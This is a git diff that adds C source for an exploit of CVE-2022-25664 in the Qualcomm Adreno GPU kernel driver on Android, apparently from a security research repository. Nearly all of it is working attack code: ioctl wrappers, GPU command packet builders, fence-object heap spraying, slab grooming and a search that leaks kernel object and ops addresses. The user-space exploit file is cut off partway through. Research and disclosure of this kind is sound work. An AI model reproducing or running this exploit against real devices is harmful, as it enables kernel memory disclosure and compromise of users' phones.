diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c new file mode 100644 index 0000000..9a9b279 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c @@ -0,0 +1,76 @@ +#include "adreno_cmd.h" + +uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr) +{ + uint *start = cmds; + + *cmds++ = lower_32_bits(gpuaddr); + *cmds++ = upper_32_bits(gpuaddr); + + return cmds - start; +} + +uint pm4_calc_odd_parity_bit(uint val) { + return (0x9669 >> (0xf & ((val) ^ + ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^ + ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^ + ((val) >> 28)))) & 1; +} + +uint cp_type7_packet(uint opcode, uint cnt) { + return CP_TYPE7_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 15) | + (((opcode) & 0x7F) << 16) | + ((pm4_calc_odd_parity_bit(opcode) << 23)); +} + +uint cp_wait_for_me( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0); + + return cmds - start; +} + +uint cp_mem_packet(int opcode, uint size, uint num_mem) { + return cp_type7_packet(opcode, size + num_mem); +} + +uint cp_wait_for_idle( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0); + + return cmds - start; +} + +uint cp_type4_packet(uint opcode, uint cnt) +{ + return CP_TYPE4_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 7) | + (((opcode) & 0x3FFFF) << 8) | + ((pm4_calc_odd_parity_bit(opcode) << 27)); +} + +uint cp_register( + unsigned int reg, unsigned int size) +{ + return cp_type4_packet(reg, size); +} + +uint cp_invalidate_state( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3); + *cmds++ = 0x40000; + *cmds++ = 0; + *cmds++ = 0; + + return cmds - start; +} diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h new file mode 100644 index 0000000..01cfeb5 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h @@ -0,0 +1,40 @@ +#ifndef ADRENO_CMD_H +#define ADRENO_CMD_H + +#include + +#define CP_TYPE4_PKT (4 << 28) +#define CP_TYPE7_PKT (7 << 28) + +#define CP_NOP 0x10 +#define CP_WAIT_FOR_ME 0x13 +#define CP_WAIT_FOR_IDLE 0x26 +#define CP_WAIT_REG_MEM 0x3c +#define CP_MEM_WRITE 0x3d +#define CP_INDIRECT_BUFFER_PFE 0x3f +#define CP_SET_DRAW_STATE 0x43 +#define CP_MEM_TO_MEM 0x73 +#define CP_SET_PROTECTED_MODE 0x5f + +#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16)) +#define lower_32_bits(n) ((uint32_t)(n)) + +uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr); + +uint pm4_calc_odd_parity_bit(uint val); + +uint cp_type7_packet(uint opcode, uint cnt); + +uint cp_wait_for_me(uint *cmds); + +uint cp_mem_packet(int opcode, uint size, uint num_mem); + +uint cp_wait_for_idle(uint *cmds); + +uint cp_type4_packet(uint opcode, uint cnt); + +uint cp_register(unsigned int reg, unsigned int size); + +uint cp_invalidate_state(uint *cmds); + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c new file mode 100644 index 0000000..474f706 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c @@ -0,0 +1,225 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include 
+#include +#include +#include +#include +#include +#include +#include + + +#include "kgsl_utils.h" +#include "adreno_cmd.h" +#include "dma_search.h" + +#define CMD_SIZE 4 + +#define OBJS_PER_SLAB (0x1000/OBJECT_SIZE) + +#define CPU_PARTIAL 30 + +#define MMAP_SPRAY 1000 + +#define OBJ_SPRAY 10000 + +#define CPU_SETSIZE 1024 +#define __NCPUBITS (8 * sizeof (unsigned long)) +typedef struct +{ + unsigned long __bits[CPU_SETSIZE / __NCPUBITS]; +} cpu_set_t; + +#define CPU_SET(cpu, cpusetp) \ + ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS))) +#define CPU_ZERO(cpusetp) \ + memset((cpusetp), 0, sizeof(cpu_set_t)) + +#define KERNEL_BRANCH KERNEL_4 + +void migrate_to_cpu(int i) +{ + int syscallres; + pid_t pid = gettid(); + cpu_set_t cpu; + CPU_ZERO(&cpu); + CPU_SET(i, &cpu); + + syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu); + if (syscallres) + { + err(1, "Error in the syscall setaffinity"); + } +} + +static uint32_t* map_anon(int kgsl_fd, uint64_t* addr, size_t size) { + uint32_t* out = NULL; + out = (uint32_t*)mmap(NULL, size, PROT_READ|PROT_WRITE, + MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + if (out == MAP_FAILED) { + err(1, "shared_mem_buf failed"); + } + int ret = kgsl_map(kgsl_fd, (unsigned long)out, size, addr, 0); + + if (ret == -1) { + err(1, "kgsl_map failed %p\n", out); + } + return out; +} + +static uint32_t write_gpu_cmd(uint32_t* write_cmd_buf, uint64_t shared_mem_gpuaddr, uint32_t n) { + uint32_t* write_cmds; + + write_cmd_buf = write_cmd_buf + 0x1000/CMD_SIZE - 5; + + write_cmds = write_cmd_buf; + + *write_cmds++ = cp_type7_packet(CP_NOP, 1); + *write_cmds++ = 0xffffffff; + + *write_cmds++ = cp_type7_packet(CP_MEM_WRITE, 2 + n); + + write_cmds += cp_gpuaddr(write_cmds, shared_mem_gpuaddr); + + return (write_cmds - write_cmd_buf + n) * CMD_SIZE; +} + + +static int io_setup(unsigned nr, aio_context_t *ctxp) +{ + return syscall(__NR_io_setup, nr, ctxp); +} + +static int io_destroy(aio_context_t ctx) +{ + return syscall(__NR_io_destroy, ctx); +} + +int find_address() { + uint32_t *write_cmd_buf; + uint64_t *shared_mem_buf; + void *shared_mem_buf2; + uint64_t shared_mem_gpuaddr2; + uint32_t n = 2048; + uint64_t shared_mem_size = 0x2000; + uint32_t cmd_size; + uint64_t write_cmd_gpuaddr = 0; + uint64_t shared_mem_gpuaddr = 0; + uint64_t hole_size = 0x1000; + int fds[OBJS_PER_SLAB * CPU_PARTIAL]; + int spray_fds[OBJ_SPRAY]; + + int fd = open("/dev/kgsl-3d0", O_RDWR); + + if (fd == -1) { + err(1, "cannot open kgsl"); + } + + uint32_t ctx_id; + if (kgsl_ctx_create(fd, &ctx_id)) { + err(1, "kgsl_ctx_create failed."); + } + + struct kgsl_syncsource_create syncsource = {0}; + if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE, &syncsource) < 0) { + err(1, "unable to create syncsource\n"); + } + + for (int i = 0; i < OBJ_SPRAY; i++) { + struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id}; + if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) { + err(1, "Failed to create fence"); + } + spray_fds[i] = create_fence.fence_fd; + } + + for (int i = 0; i < CPU_PARTIAL * OBJS_PER_SLAB; i++) { + struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id}; + if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) { + err(1, "Failed to create fence"); + } + fds[i] = create_fence.fence_fd; + } + + shared_mem_buf = (uint64_t*)map_anon(fd, &shared_mem_gpuaddr, shared_mem_size); + write_cmd_buf = map_anon(fd, &write_cmd_gpuaddr, 0x1000); + uint64_t write_cmd_gpuaddr_start = write_cmd_gpuaddr; + + write_cmd_gpuaddr 
= write_cmd_gpuaddr + 0x1000 - 5 * CMD_SIZE; + + uint32_t* write_cmd_buf_start = write_cmd_buf; + cmd_size = write_gpu_cmd(write_cmd_buf, shared_mem_gpuaddr, n); + + usleep(50000); + void* hole = mmap(NULL, hole_size, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + shared_mem_buf2 = mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + + if (shared_mem_buf2 == MAP_FAILED) { + err(1, "shared_mem_buf2 failed"); + } + + munmap(hole, hole_size); + aio_context_t ctx = 0; + uint32_t nr_events = 32; + + migrate_to_cpu(0); + for (int i = 0; i < OBJS_PER_SLAB; i++) { + close(fds[i + (CPU_PARTIAL - 1) * OBJS_PER_SLAB]); + } + + for (int i = 0; i < (CPU_PARTIAL - 1); i++) { + close(fds[i * OBJS_PER_SLAB]); + } + + if (io_setup(nr_events, &ctx) < 0) err(1, "io_setup error\n"); + if (kgsl_map(fd, (unsigned long) shared_mem_buf2, shared_mem_size, &shared_mem_gpuaddr2, 1) == -1) { + err(1, "kgsl_map failed (shared_mem_buf2)"); + } + + if (kgsl_gpu_command_payload(fd, ctx_id, 0, cmd_size, 1, 0, write_cmd_gpuaddr, cmd_size)) { + err(1, "gpu_command failed."); + } + usleep(150000); + if (shared_mem_gpuaddr2 != write_cmd_gpuaddr_start + 0x1000) { + err(1, "wrong address layout shared_mem_gpuaddr2 %lx write_cmd_gpuaddr %lx\n", shared_mem_gpuaddr2, write_cmd_gpuaddr); + } + if (ctx != (uint64_t)shared_mem_buf2 + 0x1000) { + err(1, "wrong address layout shared_mem_buf2 %p ctx %lx\n", shared_mem_buf2, ctx); + } + + int ret = dma_search(shared_mem_buf + 0x1000/8, 0x1000/8, KERNEL_BRANCH); + if (ret == -1) { + io_destroy(ctx); + munmap(shared_mem_buf2, 0x1000); + munmap(shared_mem_buf, 0x2000); + munmap(write_cmd_buf, 0x1000); + for (int i = 0; i < (CPU_PARTIAL * OBJS_PER_SLAB); i++) close(fds[i]); + for (int i = 0; i < OBJ_SPRAY; i++) close(spray_fds[i]); + close(fd); + } + return ret; +} + +int main() { + + for (int i = 0; i < MMAP_SPRAY; i++) { + mmap(NULL, 0x1000,PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + } + int success = -1; + int counter = 0; + while (success == -1) { + success = find_address(); + counter++; + if (counter % 20 == 0) printf("failed after %d\n", counter); + } + +} diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h new file mode 100644 index 0000000..b103107 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h @@ -0,0 +1,94 @@ +#ifndef DMA_SEARCH_H +#define DMA_SEARCH_H + +#include +#include + +#define OBJECT_SIZE 128 + +#define STRIDE (OBJECT_SIZE/8) + +struct dma_info { + uint64_t ops; + uint64_t cb_list; + uint64_t spinlock; + uint64_t context; +}; + +enum dma_search_type { + KERNEL_4, + KERNEL_5 +}; + +int try_match_object_54(uint64_t* obj, struct dma_info* out) { + //No ops + if (obj[1] == 0) return 0; + //cb_list not initialized + if (obj[2] != obj[3]) return 0; + //no cb_list + if (obj[2] == 0 || obj[3] == 0) return 0; + if (out->ops == 0) { + out->ops = obj[1]; + out->cb_list = obj[2]; + out->context = obj[4]; + return 1; + } + if (out->ops != obj[1]) { + printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]); + return 0; + } + return 1; +} + +int try_match_object_414(uint64_t* obj, struct dma_info* out) { + //No ops + if (obj[1] == 0) return 0; + //rcu not zero + if (obj[2] != 0 || obj[3] != 0) return 0; + //cb_list not initialized + if (obj[4] != obj[5]) return 0; + //no cb_list + if (obj[4] == 0 || obj[5] == 0) return 0; + //no spinlock + if (obj[6] == 0) return 0; + if (out->ops == 0) { + out->ops 
= obj[1]; + out->cb_list = obj[4]; + out->spinlock = obj[6]; + out->context = obj[7]; + return 1; + } + if (out->ops != obj[1]) { + printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]); + return 0; + } + if (out->spinlock != obj[6]) { + printf("out->spinlock %lx obj[6] %lx\n", out->spinlock, obj[6]); + return 0; + } + return 1; +}; + +int dma_search(uint64_t* region, size_t len, enum dma_search_type type) { + if (len % OBJECT_SIZE != 0) err(1, "len is not divisible by object size\n"); + struct dma_info info = {0}; + int match = 0; + for (int i = 0; i < len; i+= STRIDE) { + if (type == KERNEL_4) { + match += try_match_object_414(region + i, &info); + } else if (type == KERNEL_5){ + match += try_match_object_54(region + i, &info); + } else { + err(1, "unknown kernel branch\n"); + } + } + if (match > 3) { + printf("found dma fence object:\n"); + printf("kgsl_syncsource_fence_ops address: %lx\n", info.ops); + printf("object address: %lx\n", info.cb_list); + return 1; + } + return -1; +}; + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c new file mode 100644 index 0000000..1fc3c5a --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c @@ -0,0 +1,80 @@ +#include + +#include "kgsl_utils.h" + +int kgsl_ctx_create(int fd, uint32_t *ctx_id) +{ + struct kgsl_drawctxt_create req = { + .flags = 0x00001812, + }; + int ret; + + ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &req); + if (ret) + return ret; + + *ctx_id = req.drawctxt_id; + + return 0; +} + +int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size) { + struct kgsl_command_object *cmds; + + struct kgsl_gpu_command req = { + .context_id = ctx_id, + .cmdsize = sizeof(struct kgsl_command_object), + .numcmds = n, + }; + size_t cmds_size; + uint32_t i; + + cmds_size = n * sizeof(struct kgsl_command_object); + + cmds = (struct kgsl_command_object *) malloc(cmds_size); + + if (cmds == NULL) { + return -1; + } + + memset(cmds, 0, cmds_size); + + for (i = 0; i < n; i++) { + cmds[i].flags = KGSL_CMDLIST_IB; + + if (i == target_idx) { + cmds[i].gpuaddr = target_cmd; + cmds[i].size = target_size; + } + else { + /* the shift here is helpful for debugging failed alignment */ + cmds[i].gpuaddr = gpuaddr + (i << 16); + cmds[i].size = cmdsize; + } + } + req.cmdlist = (unsigned long) cmds; + return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req); +} + +int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly) { + struct kgsl_map_user_mem req = { + .len = len, + .offset = 0, + .hostptr = addr, + .memtype = KGSL_USER_MEM_TYPE_ADDR, +// .flags = KGSL_MEMFLAGS_USE_CPU_MAP, + }; + if (readonly) { + req.flags |= KGSL_MEMFLAGS_GPUREADONLY; + } + int ret; + + ret = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &req); + if (ret) + return ret; + + *gpuaddr = req.gpuaddr; + + return 0; +} + diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h new file mode 100644 index 0000000..79033dc --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h @@ -0,0 +1,237 @@ +#ifndef KGSL_UTILS_H +#define KGSL_UTILS_H + +#include +#include +#include + +#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL + +#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U + +#define 
KGSL_OBJLIST_MEMOBJ 0x00000008U +#define KGSL_OBJLIST_PROFILE 0x00000010U +#define KGSL_DRAWOBJ_PROFILING 0x00000010 +#define KGSL_MEMFLAGS_IOCOHERENT (1ULL << 31) + +enum kgsl_user_mem_type { + KGSL_USER_MEM_TYPE_PMEM = 0x00000000, + KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001, + KGSL_USER_MEM_TYPE_ADDR = 0x00000002, + KGSL_USER_MEM_TYPE_ION = 0x00000003, + /* + * ION type is retained for backwards compatibility but Ion buffers are + * dma-bufs so try to use that naming if we can + */ + KGSL_USER_MEM_TYPE_DMABUF = 0x00000003, + KGSL_USER_MEM_TYPE_MAX = 0x00000007, +}; + +struct kgsl_timeline_fence_get { + __u64 seqno; + __u32 timeline; + int handle; +}; + +#define IOCTL_KGSL_TIMELINE_FENCE_GET \ + _IOWR(KGSL_IOC_TYPE, 0x5C, struct kgsl_timeline_fence_get) + + +struct kgsl_timeline_create { + __u64 seqno; + __u32 id; +/* private: padding for 64 bit compatibility */ + __u32 padding; +}; + +#define IOCTL_KGSL_TIMELINE_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x58, struct kgsl_timeline_create) + +#define IOCTL_KGSL_TIMELINE_DESTROY _IOW(KGSL_IOC_TYPE, 0x5D, __u32) + +struct kgsl_device_getproperty { + unsigned int type; + void *value; + size_t sizebytes; +}; + +#define IOCTL_KGSL_DEVICE_GETPROPERTY \ + _IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty) + + +struct kgsl_gpumem_alloc_id { + unsigned int id; + unsigned int flags; + uint64_t size; + uint64_t mmapsize; + unsigned long gpuaddr; +}; + +#define IOCTL_KGSL_GPUMEM_ALLOC_ID \ + _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id) + +struct kgsl_command_object { + uint64_t offset; + uint64_t gpuaddr; + uint64_t size; + unsigned int flags; + unsigned int id; +}; + +struct kgsl_gpu_command { + uint64_t flags; + uint64_t __user cmdlist; + unsigned int cmdsize; + unsigned int numcmds; + uint64_t __user objlist; + unsigned int objsize; + unsigned int numobjs; + uint64_t __user synclist; + unsigned int syncsize; + unsigned int numsyncs; + unsigned int context_id; + unsigned int timestamp; +}; + +struct kgsl_map_user_mem { + int fd; + unsigned long gpuaddr; /*output param */ + size_t len; + size_t offset; + unsigned long hostptr; /*input param */ + enum kgsl_user_mem_type memtype; + unsigned int flags; +}; + +struct kgsl_drawctxt_create { + unsigned int flags; + unsigned int drawctxt_id; /*output param */ +}; + +/* destroy a draw context */ +struct kgsl_drawctxt_destroy { + unsigned int drawctxt_id; +}; + + +#define KGSL_IOC_TYPE 0x09 + +#define IOCTL_KGSL_DRAWCTXT_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create) + +#define IOCTL_KGSL_DRAWCTXT_DESTROY \ + _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy) + +#define IOCTL_KGSL_MAP_USER_MEM \ + _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem) + +#define IOCTL_KGSL_GPU_COMMAND \ + _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command) + +#define KGSL_CMDLIST_IB 0x00000001U +#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL + +struct kgsl_gpuobj_import { + uint64_t __user priv; + uint64_t priv_len; + uint64_t flags; + unsigned int type; + unsigned int id; +}; + +struct kgsl_gpuobj_import_dma_buf { + int fd; +}; + +struct kgsl_gpuobj_import_useraddr { + uint64_t virtaddr; +}; + +struct kgsl_gpuobj_free { + uint64_t flags; + uint64_t __user priv; + unsigned int id; + unsigned int type; + unsigned int len; +}; + +#define KGSL_GPUOBJ_FREE_ON_EVENT 1 + +#define KGSL_GPU_EVENT_TIMESTAMP 1 +#define KGSL_GPU_EVENT_FENCE 2 + +struct kgsl_gpu_event_timestamp { + unsigned int context_id; + unsigned int timestamp; +}; + +struct kgsl_gpu_event_fence { + int fd; +}; + +struct 
kgsl_gpumem_free_id { + unsigned int id; +/* private: reserved for future use*/ + unsigned int __pad; +}; + +#define IOCTL_KGSL_GPUMEM_FREE_ID _IOWR(KGSL_IOC_TYPE, 0x35, struct kgsl_gpumem_free_id) + +#define IOCTL_KGSL_GPUOBJ_FREE \ + _IOW(KGSL_IOC_TYPE, 0x46, struct kgsl_gpuobj_free) + +struct dma_buf_sync { + __u64 flags; +}; + +#define DMA_BUF_SYNC_READ (1 << 0) +#define DMA_BUF_SYNC_WRITE (2 << 0) +#define DMA_BUF_SYNC_RW (DMA_BUF_SYNC_READ | DMA_BUF_SYNC_WRITE) +#define DMA_BUF_SYNC_START (0 << 2) +#define DMA_BUF_SYNC_END (1 << 2) +#define DMA_BUF_SYNC_USER_MAPPED (1 << 3) + +#define DMA_BUF_SYNC_VALID_FLAGS_MASK \ + (DMA_BUF_SYNC_RW | DMA_BUF_SYNC_END) + +#define DMA_BUF_BASE 'b' +#define DMA_BUF_IOCTL_SYNC _IOW(DMA_BUF_BASE, 0, struct dma_buf_sync) + +#define KGSL_MEMFLAGS_FORCE_32BIT 0x100000000ULL + + +struct kgsl_syncsource_create { + unsigned int id; +/* private: reserved for future use */ + unsigned int __pad[3]; +}; + +#define IOCTL_KGSL_SYNCSOURCE_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x40, struct kgsl_syncsource_create) + +struct kgsl_syncsource_create_fence { + unsigned int id; + int fence_fd; +/* private: reserved for future use */ + unsigned int __pad[4]; +}; + +/** + * struct kgsl_syncsource_signal_fence - Argument to + * IOCTL_KGSL_SYNCSOURCE_SIGNAL_FENCE + * @id: syncsource id + * @fence_fd: sync_fence fd to signal + * + * Signal a fence that was created by a IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE + * call using the same syncsource id. This allows a fence to be shared + * to other processes but only signaled by the process owning the fd + * used to create the fence. + */ +#define IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE \ + _IOWR(KGSL_IOC_TYPE, 0x42, struct kgsl_syncsource_create_fence) + +int kgsl_ctx_create(int fd, uint32_t *ctx_id); +int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size); +int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly); + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h new file mode 100644 index 0000000..7224cc6 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h @@ -0,0 +1,218 @@ +#ifndef ADRENO_H +#define ADRENO_H + +#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U + +enum kgsl_user_mem_type { + KGSL_USER_MEM_TYPE_PMEM = 0x00000000, + KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001, + KGSL_USER_MEM_TYPE_ADDR = 0x00000002, + KGSL_USER_MEM_TYPE_ION = 0x00000003, + KGSL_USER_MEM_TYPE_DMABUF = 0x00000003, + KGSL_USER_MEM_TYPE_MAX = 0x00000007, +}; + +struct kgsl_command_object { + uint64_t offset; + uint64_t gpuaddr; + uint64_t size; + unsigned int flags; + unsigned int id; +}; + +struct kgsl_gpu_command { + uint64_t flags; + uint64_t __user cmdlist; + unsigned int cmdsize; + unsigned int numcmds; + uint64_t __user objlist; + unsigned int objsize; + unsigned int numobjs; + uint64_t __user synclist; + unsigned int syncsize; + unsigned int numsyncs; + unsigned int context_id; + unsigned int timestamp; +}; + +struct kgsl_map_user_mem { + int fd; + unsigned long gpuaddr; /*output param */ + size_t len; + size_t offset; + unsigned long hostptr; /*input param */ + enum kgsl_user_mem_type memtype; + unsigned int flags; +}; + +struct kgsl_drawctxt_create { + unsigned int flags; + unsigned int drawctxt_id; /*output param */ +}; + +/* destroy a draw context */ +struct kgsl_drawctxt_destroy 
{ + unsigned int drawctxt_id; +}; + + +#define KGSL_IOC_TYPE 0x09 + +#define IOCTL_KGSL_DRAWCTXT_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create) + +#define IOCTL_KGSL_DRAWCTXT_DESTROY \ + _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy) + +#define IOCTL_KGSL_MAP_USER_MEM \ + _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem) + +#define IOCTL_KGSL_GPU_COMMAND \ + _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command) + +#define KGSL_CMDLIST_IB 0x00000001U +#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL + +#define CP_TYPE4_PKT (4 << 28) +#define CP_TYPE7_PKT (7 << 28) + +#define CP_NOP 0x10 +#define CP_WAIT_FOR_ME 0x13 +#define CP_WAIT_FOR_IDLE 0x26 +#define CP_WAIT_REG_MEM 0x3c +#define CP_MEM_WRITE 0x3d +#define CP_INDIRECT_BUFFER_PFE 0x3f +#define CP_SET_DRAW_STATE 0x43 +#define CP_MEM_TO_MEM 0x73 +#define CP_SET_PROTECTED_MODE 0x5f + +#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16)) +#define lower_32_bits(n) ((uint32_t)(n)) + + +#define PT_BASE 0xfc000000 +#define KGSL_OBJLIST_MEMOBJ 0x00000008U +#define KGSL_OBJLIST_PROFILE 0x00000010U +#define KGSL_DRAWOBJ_PROFILING 0x00000010 +#define KGSL_MEMFLAGS_IOCOHERENT (1ULL << 31) + +struct kgsl_device_getproperty { + unsigned int type; + void *value; + size_t sizebytes; +}; + +#define IOCTL_KGSL_DEVICE_GETPROPERTY \ + _IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty) + + +struct kgsl_gpumem_alloc_id { + unsigned int id; + unsigned int flags; + uint64_t size; + uint64_t mmapsize; + unsigned long gpuaddr; +}; + +struct kgsl_gpumem_free_id { + unsigned int id; +}; + +#define IOCTL_KGSL_GPUMEM_ALLOC_ID \ + _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id) + +struct kgsl_sharedmem_free { + unsigned long gpuaddr; +}; + +#define IOCTL_KGSL_SHAREDMEM_FREE \ + _IOW(KGSL_IOC_TYPE, 0x21, struct kgsl_sharedmem_free) + +static inline uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr) +{ + uint *start = cmds; + + *cmds++ = lower_32_bits(gpuaddr); + *cmds++ = upper_32_bits(gpuaddr); + + return cmds - start; +} + +static inline uint pm4_calc_odd_parity_bit(uint val) { + return (0x9669 >> (0xf & ((val) ^ + ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^ + ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^ + ((val) >> 28)))) & 1; +} + +static inline uint cp_type7_packet(uint opcode, uint cnt) { + return CP_TYPE7_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 15) | + (((opcode) & 0x7F) << 16) | + ((pm4_calc_odd_parity_bit(opcode) << 23)); +} + +static inline uint cp_wait_for_me( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0); + + return cmds - start; +} + +static inline uint cp_mem_packet(int opcode, uint size, uint num_mem) { + return cp_type7_packet(opcode, size + num_mem); +} + +static inline uint cp_wait_for_idle( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0); + + return cmds - start; +} + +static inline int _adreno_iommu_add_idle_indirect_cmds( + unsigned int *cmds) +{ + unsigned int *start = cmds; + cmds += cp_wait_for_me(cmds); + *cmds++ = cp_mem_packet(CP_INDIRECT_BUFFER_PFE, 2, 1); + cmds += cp_gpuaddr(cmds, 0xfc000000+1024); + *cmds++ = 2; + cmds += cp_wait_for_idle(cmds); + return cmds - start; +} + +static inline uint cp_type4_packet(uint opcode, uint cnt) +{ + return CP_TYPE4_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 7) | + (((opcode) & 0x3FFFF) << 8) | + ((pm4_calc_odd_parity_bit(opcode) << 27)); +} + +static inline uint cp_register( + unsigned int reg, unsigned int size) +{ + return cp_type4_packet(reg, 
size);
+}
+
+static inline uint cp_invalidate_state(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3);
+ *cmds++ = 0x40000;
+ *cmds++ = 0;
+ *cmds++ = 0;
+
+ return cmds - start;
+}
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c
new file mode 100644
index 0000000..ba980e8
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c
@@ -0,0 +1,221 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include "adreno.h"
+
+#define LEAK_SIZE 100
+
+#define COMMAND_SIZE 4
+
+static void hexdump(void *_data, size_t byte_count) {
+ printf("hexdump(%p, 0x%lx)\n", _data, (uint64_t)byte_count);
+ for (uint64_t byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
+ unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
+ uint64_t line_bytes = (byte_count - byte_offset > 16) ?
+ 16 : (byte_count - byte_offset);
